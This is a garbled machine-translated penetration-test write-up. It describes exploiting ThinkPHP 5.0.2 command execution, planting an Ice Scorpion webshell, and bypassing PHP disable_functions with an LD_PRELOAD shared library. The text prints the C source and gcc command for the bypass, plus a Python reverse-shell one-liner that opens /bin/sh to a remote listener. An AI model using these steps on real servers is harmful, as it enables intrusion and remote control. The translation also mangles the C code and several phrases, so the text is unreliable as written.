Shulou(Shulou.com)06/01 Report--

This article is about how to solve the bypass_disable_functions caused by ThinkPHP. The editor thinks it is very practical, so I share it with you to learn. I hope you can get something after reading this article.

In an authorization test, it was found that the website was built by ThinkPHP 5.0.2.

The vulnerability exists in ThinkPHP 5.0.2 command execution.

Horses that try to write to Ice Scorpion 3.0

It is a problem for & to write an error report. Encode & url. Try again

The link failed.

After a local attempt, it was found that it was a + problem, and after writing it again, the + was changed into a space. Encode it with url and write it again

Link found failed to continue the liver.

In addition to writing, you can also use the copy function in PHP to start the service on vps and download vps's girlfriend directly to the target server.

If the link is successful, it must be whoami next.

Check disable_functions and find that the lovely pagoda has disabled passthru,exec,system,chroot,chgrp,chown,shell_exec,popen,proc_open,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru.

What else is the pagoda can not be forbidden. What else can I do? then liver, I learned the boss's post on the Internet.

Https://www.meetsec.cn/index.php/archives/44/

Try to bypass disable_functions with LD_PRELOAD

Go directly to the code

Bypass_disablefunc.php

Bypass_disablefunc.c

# define _ GNU_SOURCE

# include stdlib.h

# include stdio.h

# include string.h

Extern char environ

_ _ attribute__ ((_ _ constructor__)) void preload (void)

{

Get command line options and arg

Const char cmdline = getenv (EVIL_CMDLINE)

Unset environment variable LD_PRELOAD.

Unsetenv (LD_PRELOAD) no effect on some

Distribution (e.g.centos), I need crafty trick.

Int i

For (I = 0; environ [I]; + I) {

If (strstr (environ [I], LD_PRELOAD)) {

Environ [I] [0] ='0'

}

}

Executive command

System (cmdline)

}

Compile bypass_disablefunc.c to a shared object bypass_disablefunc_x64.so with the command gcc-shared-fPIC bypass_disablefunc.c-o bypass_disablefunc_x64.so:

To compile to different versions according to the target architecture, in an x64 environment, the default is x64 if there is no compilation option, and the-M32 option is required to compile to x86 architecture.

Upload through ice scorpion, and then test the effect:

The command was executed successfully. Nc bounce shell

Prompt does not have the parameter of-e, use python bounce directly

Python-c 'import socket,subprocess,os;s=socket.socket (socket.AF_INET,socket.SOCK_STREAM); s.connect (("127.0.0.1", 8888); os.dup2 (s.fileno (), 0); os.dup2 (s.fileno (), 1); os.dup2 (s.fileno (), 2); p=subprocess.call (["/ bin/sh", "- I"]);'

Rebound successfully

Summary: this test, the process of writing ice scorpion should pay attention to coding problems. Then it uses LD_PRELOAD to bypass disable_functions.

The above is how to solve the bypass_disable_functions caused by ThinkPHP. The editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.